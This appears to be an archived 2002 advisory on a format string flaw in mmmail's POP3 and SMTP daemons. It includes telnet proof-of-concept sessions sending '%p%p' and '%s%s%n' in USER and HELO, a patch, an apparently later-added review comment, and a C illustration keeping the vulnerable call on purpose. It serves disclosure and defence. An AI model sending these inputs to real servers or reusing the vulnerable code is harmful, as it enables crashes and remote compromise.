OSEC

From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Wed Jun 12 2002 - 07:49:49 CDT



    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    04 06 2002 ID #1054-040602
    ________________________________________________________________________
    TITLE : mmmail POP3-SMTP Daemon Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            mmmail <= 0.0.13 (mmpop3d & mmsmtpd)

    ________________________________________________________________________

    DESCRIPTION
    ===========

            "mmmail provides SMTP and POP3 daemons using MySQL, running as
    a non-root user. It also supports bandwidth shaping. Relaying is not
    supported, although it has been designed to handle many users on many
    virtual hosts. It is fast and secure, uses threads, and has been written
    entirely from scratch and does not rely on mbox or Maildir formats."

            mmmail includes two daemons, mmpop3d and mmsmtpd. Both are
    vulnerable to the same remotely exploitable format string issue.

    ________________________________________________________________________

    DETAILS
    =======

            There is a format string vulnerability in the 'mmsyslog()'
    function of the 'mmpop3d' and 'mmsmtpd' programs. This function acts
    like 'vsyslog()' if '__GLIBC__' is defined. It calls the 'syslog(3)'
    function with a format string that a remote user can control: the
    argument of the POP3 'USER' command or of the SMTP 'HELO' command is
    copied into the string that 'syslog(3)' then interprets as a format.
    It is not necessary to authenticate to exploit this vulnerability.

    Successful exploitation of this flaw can allow a remote user to obtain
    a local account on the target machine (the daemons run as a non-root
    user).

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

    mmpop3d
    -------

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    +OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
    USER %p%p
    -ERR Invalid username

    In the log file:
    mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    +OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
    USER %s%s%n
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    mmsmtpd
    -------
    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
    HELO %p%p
    501 Invalid hostname

    In the log file:
    mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
    HELO %s%s%n
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    ________________________________________________________________________

    SOLUTION
    ========

    The following patch corrects this issue:

    diff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
    --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
    +++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun 4 12:37:19 2002
    @@ -70,7 +70,7 @@
      va_start(lst, fmt);
      vsnprintf(buf, 1023, fmt, lst);
      va_end(lst);
    - - syslog(LOG_NOTICE, buf);
    + syslog(LOG_NOTICE, "%s", buf);
         }
     }
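
    Review bot: correct fix; buf now reaches syslog() as an argument to the constant "%s" format instead of as the format itself, so '%' sequences that arrived in the USER or HELO argument are no longer interpreted. Two follow-ups on the surrounding lines: `vsnprintf(buf, 1023, fmt, lst);` hardcodes the bound, and `sizeof(buf)` (or `sizeof(buf) - 1` if the 1023 was deliberate) would keep it tied to the declaration, which is not visible in this hunk. And since DETAILS says mmsyslog() takes a different path when __GLIBC__ is defined, confirm that the other preprocessor branch also passes remote data only as an argument, never as the format.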

    A new version including this patch is available at the following URL:
    http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz
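
    The two-stage formatting described in DETAILS and the one-line fix in the patch above, as an added C illustration that is not mmmail's code: the sink is modelled with snprintf() into a buffer instead of syslog(3) so the result can be inspected, and the caller format "%08X USER %s" and the session id are assumptions for the example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added illustration, not mmmail's code: models mmsyslog() as it appears in
 * the advisory's patch, with snprintf() into 'out' standing in for syslog(3)
 * so the result can be inspected.  The caller format "%08X USER %s" and the
 * session id are assumptions for the example. */

/* Before the fix: the already-formatted line is handed to the sink as its
 * format string, so '%' sequences the client put in the username are
 * interpreted a second time.  With "%p%p" this reads arguments that were
 * never passed (undefined behaviour; the advisory's log shows two pointers
 * leaking) and "%n" writes to memory.  Only call this with benign input. */
static const char *mmsyslog_vuln(char *out, size_t outlen, const char *fmt, ...)
{
    char buf[1024];
    va_list lst;
    va_start(lst, fmt);
    vsnprintf(buf, sizeof buf, fmt, lst);   /* stage 1: trusted fmt, fine */
    va_end(lst);
    snprintf(out, outlen, buf);             /* stage 2: buf is the format! */
    return out;
}

/* After the fix (mirrors the mmmail-0.0.14 patch): buf is an argument to
 * the constant "%s" format, so its contents are copied, never interpreted. */
static const char *mmsyslog_fixed(char *out, size_t outlen, const char *fmt, ...)
{
    char buf[1024];
    va_list lst;
    va_start(lst, fmt);
    vsnprintf(buf, sizeof buf, fmt, lst);
    va_end(lst);
    snprintf(out, outlen, "%s", buf);
    return out;
}

int main(void)
{
    char line[256];
    /* Benign username: both versions agree, which is why the bug hides. */
    puts(mmsyslog_vuln(line, sizeof line, "%08X USER %s", 0x3CFC8B53u, "alice"));
    /* The advisory's probes: the fixed sink logs them literally. */
    puts(mmsyslog_fixed(line, sizeof line, "%08X USER %s", 0x3CFC8B53u, "%p%p"));
    puts(mmsyslog_fixed(line, sizeof line, "%08X USER %s", 0x3CFC8B53u, "%s%s%n"));
    return 0;
}
```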

    ________________________________________________________________________

    VENDOR STATUS
    =============

            04-06-2002: This bulletin was sent to Matthew Mondor.
            05-06-2002: Matthew responded promptly, confirmed the
                        vulnerability and released a new version.

    ________________________________________________________________________

    LEGAL
    =====

            mmmail is a registered trademark.

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2002. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau
    92024 Nanterre Cedex - France
    Standard: +33 1 55 69 49 10
    Fax: +33 1 55 69 78 80
